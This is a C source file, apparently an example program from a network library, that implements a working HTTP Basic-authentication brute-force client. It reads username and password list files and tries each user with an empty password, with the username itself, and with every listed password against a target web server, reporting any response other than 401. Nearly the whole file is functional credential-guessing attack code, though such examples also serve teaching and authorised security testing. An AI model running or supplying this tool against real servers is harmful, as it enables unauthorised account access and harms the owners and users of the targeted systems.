
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000202=
{ /*reference*/     "lcrzoex", 202,
  /*version*/       1, 0,
  /*title*/         "real tcp client [web get brute force]",
  /*french title*/  "client tcp reel [web get brute force]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port url usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur url fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.5 4444 /index.html /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.5 4444 /index.html /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000202_main(int argc, char *argv[]);
int lcrzoex_000202_http_get_brute(lcrzo_ipl ipl,
				  lcrzo_uint16 port,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000202_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  lcrzo_file fileuser, filepass;

  lcrzo_init();
  if ( argc<6 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000202, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* the default resolver timeout is too short if it's long to reach
     webserver's DNS */
  lcrzo_epr(shared_http_set_resolver_timeout());

  /* initialize the needed variables */
  lcrzo_epr(shared_para_ipl_init_dst(argv[1], &ipl));
  lcrzo_epr(shared_para_port_init_dst(argv[2], 80, &port));
  lcrzo_epr(lcrzo_file_open_read(argv[4], &fileuser));

  /* read each line of the files all try to access */  
  while ( lcrzo_file_readm_line(&fileuser, LCRZO_WAIT_INFINITE, 
				(lcrzo_data*)&user, &datasize)
	  == LCRZO_ERR_OK )
  { user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					    user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					    user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_file_open_read(argv[5], &filepass));
    while ( lcrzo_file_readm_line(&filepass, LCRZO_WAIT_INFINITE,
				  (lcrzo_data*)&pass, &datasize)
	  == LCRZO_ERR_OK )
    { pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					      user, pass));
      lcrzo_epr(lcrzo_string_free2(&pass));
    }
    lcrzo_epr(lcrzo_file_close(&filepass));
    lcrzo_epr(lcrzo_string_free2(&user));
  }

  /* close */
  lcrzo_epr(lcrzo_file_close(&fileuser));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000202_http_get_brute(lcrzo_ipl ipl,
				  lcrzo_uint16 port,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass)
{ static lcrzo_uint32 numtest=0;
  lcrzo_sock sock;
  lcrzo_uint16 errornumber;
  lcrzo_string errormsg;
  
  /* open the connection */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));
  
  /* send a request */
  lcrzo_epr(shared_http_request_get(&sock, url, hostname, port, 
				    NULL, NULL, user, pass));

  /* analyze the answer */
  lcrzo_epr(shared_http_response_readheader(&sock,
					    &errornumber,
					    &errormsg,
					    NULL, NULL, NULL, NULL,
					    NULL, NULL));
  if ( errornumber!=401 )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
  }
  else
  { numtest++;
    if (!(numtest%10))
    { lcrzo_epr(lcrzo_uint32_print("", numtest, "%u", " passwd tried\n"));
    }
  }
  lcrzo_epr(lcrzo_string_free2(&errormsg));

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



